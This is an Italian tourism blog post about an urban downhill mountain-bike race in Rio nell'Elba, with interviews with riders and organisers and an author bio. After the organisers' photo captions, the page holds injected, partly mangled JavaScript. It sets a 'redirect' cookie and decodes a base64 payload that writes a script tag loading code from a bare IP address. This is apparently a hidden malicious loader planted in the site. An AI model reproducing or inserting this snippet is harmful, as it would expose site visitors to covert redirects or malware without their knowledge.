Marek Petelik

Un sentiero di downhill a Rio Elba


Sabato 29 e domenica 30 Aprile Rio nell’Elba è stato il palcoscenico della gara del circuito Urban Down Alley: il primo circuito di gare Mountain Bike Downhill urbane mai organizzato in Italia.

Partenza del percorso dal Monte Strega con i suoi panorami spettacolari in mezzo alla natura, per entrare poi nel centro storico del paese da una delle porte storiche, attraversando la zona del Buchino e la scalinata della zona della Pietà.

Noi di VisitElba non potevamo mancare ed abbiamo incontrato Jakub Šmejkal , Marek Petelik e Martin Soukup. Per loro essere un biker non è solo una passione ma è un vero e proprio stile di vita.

 Jakub Šmejkal e Martin Soukup

Jakub Šmejkal e Martin Soukup

I ragazzi ci hanno parlato dei loro progetti, dopo il Czech Downhill ed Czech Downtown Tour (rispettivamente due circuiti downhill il primo immerso nella natura e d in secondo nelle città) adesso vorrebbero realizzare un nuovo circuito l’European City Downhill Challenge, nelle principali città europee.

Martin Soukup

Jacub Smejkal

Marek è il volto del Downtown Tour, pratica questo sport ormai da 14 anni e del percorso elbano ha amato di più la natura incontaminata e l’aria pulita, un posto spettacolare perfetto per alternare l’adrenalina del downhill al relax .
Anche Jakub e Martin hanno apprezzato la natura dell’Elba e ci dicono che quando riesci a organizzare un evento in un’ isola lo rendi speciale perché  diventa esclusivo.
Salutiamo i ragazzi e facciamo due chiacchiere con Mario Milani. Pratica questo sport da 12 – 13 anni e anche lui ci confida di aver apprezzato particolarmente la natura e il paesaggio elbani.

Mario Milani

Mario Milani

Incontriamo poi Dario Scattu, l’organizzatore di Elba Gravity Park e Thomas Zorzi il presidente, gli chiediamo quali sono stati i commenti dei partecipanti e ci dicono che i bikers hanno definito il tracciato “istintivo” e l’interno del paese “tecnico”, apprezzando quindi la parte più adrenalinica dell’Elba.

Dario Scattu e Thomas Zurzi

Dario Scattu e Thomas Zorzi

_ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

Share this post

Federica Mazzei

Elbana di nascita, giramondo per natura. Nata nel 1984 consegue nel 2007 una laurea triennale in Comunicazione sociale e nel 2009 una laurea magistrale con lode in Sistemi e progetti di comunicazione, prosegue il percorso formativo con una borsa di studio di due anni presso la Scuola Superiore Sant'Anna di Pisa (attività di supporto e potenziamento Ufficio Relazioni con il Pubblico, progettazione Piani integrati a livello di Zona distretto). Esperienze lavorative nel settore delle relazioni al pubblico, negli enti del terzo settore e nella comunicazione digitale.

Nessun commento

Aggiungi commento